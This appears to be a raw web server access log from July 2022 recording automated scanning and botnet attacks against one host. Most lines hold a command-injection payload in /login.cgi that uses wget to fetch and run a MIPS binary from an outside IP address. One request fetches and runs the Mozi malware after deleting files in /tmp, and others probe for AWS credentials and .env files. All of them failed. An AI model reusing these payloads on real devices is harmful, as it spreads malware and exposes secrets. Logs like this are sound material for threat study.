170.210.45.163 - - [04/Jul/2022:01:20:18 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
170.210.45.163 - - [04/Jul/2022:01:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
115.58.119.7 - - [04/Jul/2022:01:21:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
101.17.94.39 - - [04/Jul/2022:01:24:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
101.17.94.39 - - [04/Jul/2022:01:24:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:01:24:43 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
46.249.32.102 - - [04/Jul/2022:01:27:15 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
60.179.219.219 - - [04/Jul/2022:01:27:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:01:29:03 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
39.70.41.14 - - [04/Jul/2022:01:30:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
60.179.219.219 - - [04/Jul/2022:01:30:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.121.40.214 - - [04/Jul/2022:01:31:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:01:31:58 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
108.27.54.116 - - [04/Jul/2022:01:32:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:01:33:01 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Jul/2022:01:33:01 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
110.51.195.129 - - [04/Jul/2022:01:33:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
119.190.12.114 - - [04/Jul/2022:01:33:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
109.235.58.237 - - [04/Jul/2022:01:34:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
109.235.58.228 - - [04/Jul/2022:01:34:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
119.190.12.114 - - [04/Jul/2022:01:35:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Jul/2022:01:36:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.102.170.250 - - [04/Jul/2022:01:37:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
110.51.195.129 - - [04/Jul/2022:01:38:23 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
118.81.60.16 - - [04/Jul/2022:01:38:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
34.76.158.233 - - [04/Jul/2022:01:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.0"
185.7.214.104 - - [04/Jul/2022:01:39:19 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.102.170.250 - - [04/Jul/2022:01:40:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
222.137.38.119 - - [04/Jul/2022:01:40:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
122.140.95.148 - - [04/Jul/2022:01:40:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:01:42:13 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
58.59.53.218 - - [04/Jul/2022:01:43:45 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
115.58.4.126 - - [04/Jul/2022:01:45:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
34.78.6.216 - - [04/Jul/2022:01:48:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.0"
125.43.186.44 - - [04/Jul/2022:01:48:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
189.166.76.233 - - [04/Jul/2022:01:49:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
96.44.143.86 - - [04/Jul/2022:01:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
120.40.105.70 - - [04/Jul/2022:01:49:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
111.20.101.22 - - [04/Jul/2022:01:50:04 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
113.205.40.237 - - [04/Jul/2022:01:51:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.118.154.104 - - [04/Jul/2022:01:51:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.118.154.104 - - [04/Jul/2022:01:51:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
96.44.143.86 - - [04/Jul/2022:01:52:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Jul/2022:01:53:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
96.44.143.86 - - [04/Jul/2022:01:53:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [04/Jul/2022:01:53:39 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
125.41.0.22 - - [04/Jul/2022:01:54:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
96.44.143.86 - - [04/Jul/2022:01:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [04/Jul/2022:01:54:49 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.195.93.98 - - [04/Jul/2022:01:55:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.0"
35.233.62.116 - - [04/Jul/2022:01:55:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.0"
96.44.143.86 - - [04/Jul/2022:01:56:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Jul/2022:01:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.235.58.232 - - [04/Jul/2022:01:56:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
109.235.58.233 - - [04/Jul/2022:01:56:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
171.120.76.53 - - [04/Jul/2022:01:56:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.120.76.53 - - [04/Jul/2022:01:56:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.102.170.250 - - [04/Jul/2022:02:00:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
218.10.139.128 - - [04/Jul/2022:02:00:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
96.44.143.86 - - [04/Jul/2022:02:02:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [04/Jul/2022:02:02:29 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
34.78.6.216 - - [04/Jul/2022:02:03:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.0"
123.120.172.88 - - [04/Jul/2022:02:04:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
123.120.172.88 - - [04/Jul/2022:02:04:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
20.58.36.213 - - [04/Jul/2022:02:04:51 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Java/1.8.0_333"
20.58.36.213 - - [04/Jul/2022:02:05:19 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Java/1.8.0_333"
185.7.214.104 - - [04/Jul/2022:02:05:38 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
71.172.81.20 - - [04/Jul/2022:02:07:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
46.249.32.102 - - [04/Jul/2022:02:08:46 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
125.43.186.44 - - [04/Jul/2022:02:12:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:13:52 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
121.21.163.78 - - [04/Jul/2022:02:15:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
113.6.146.117 - - [04/Jul/2022:02:17:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
120.11.240.223 - - [04/Jul/2022:02:17:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
113.6.146.117 - - [04/Jul/2022:02:17:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
113.6.146.117 - - [04/Jul/2022:02:17:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:19:28 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.30.235.170 - - [04/Jul/2022:02:19:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
120.6.35.169 - - [04/Jul/2022:02:20:47 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
109.237.103.118 - - [04/Jul/2022:02:21:27 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [04/Jul/2022:02:21:27 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
49.171.122.25 - - [04/Jul/2022:02:21:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
221.181.147.191 - - [04/Jul/2022:02:22:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
120.6.35.169 - - [04/Jul/2022:02:24:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
130.255.130.11 - - [04/Jul/2022:02:24:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
218.71.8.115 - - [04/Jul/2022:02:24:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
218.71.8.115 - - [04/Jul/2022:02:24:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:24:43 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
118.73.36.178 - - [04/Jul/2022:02:25:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
118.73.36.178 - - [04/Jul/2022:02:25:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.121.40.214 - - [04/Jul/2022:02:26:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
39.70.194.79 - - [04/Jul/2022:02:26:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
39.70.194.79 - - [04/Jul/2022:02:26:32 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
221.234.134.78 - - [04/Jul/2022:02:28:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.234.134.78:50665/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
175.20.195.42 - - [04/Jul/2022:02:31:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.121.40.214 - - [04/Jul/2022:02:31:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:31:48 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
2.57.122.98 - - [04/Jul/2022:02:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.237.103.118 - - [04/Jul/2022:02:33:02 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [04/Jul/2022:02:33:02 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
123.120.172.88 - - [04/Jul/2022:02:33:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:35:12 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
125.24.107.70 - - [04/Jul/2022:02:38:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
119.166.222.166 - - [04/Jul/2022:02:38:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
119.166.222.166 - - [04/Jul/2022:02:38:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Jul/2022:02:40:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
111.224.194.115 - - [04/Jul/2022:02:41:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Jul/2022:02:41:12 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Jul/2022:02:41:37 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Jul/2022:02:42:08 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
123.233.223.176 - - [04/Jul/2022:02:42:12 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
118.73.204.104 - - [04/Jul/2022:02:43:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.102.170.250 - - [04/Jul/2022:02:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
178.62.36.21 - - [04/Jul/2022:02:44:11 +0200] "HEAD / HTTP/1.1" 200 - "-" "python-requests/2.22.0"
178.62.36.21 - - [04/Jul/2022:02:44:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:13 +0200] "GET //vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:13 +0200] "GET //.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:13 +0200] "GET //.env.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:14 +0200] "GET //env.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:14 +0200] "GET //.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:15 +0200] "GET //.aws/credentials/phpinfo HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
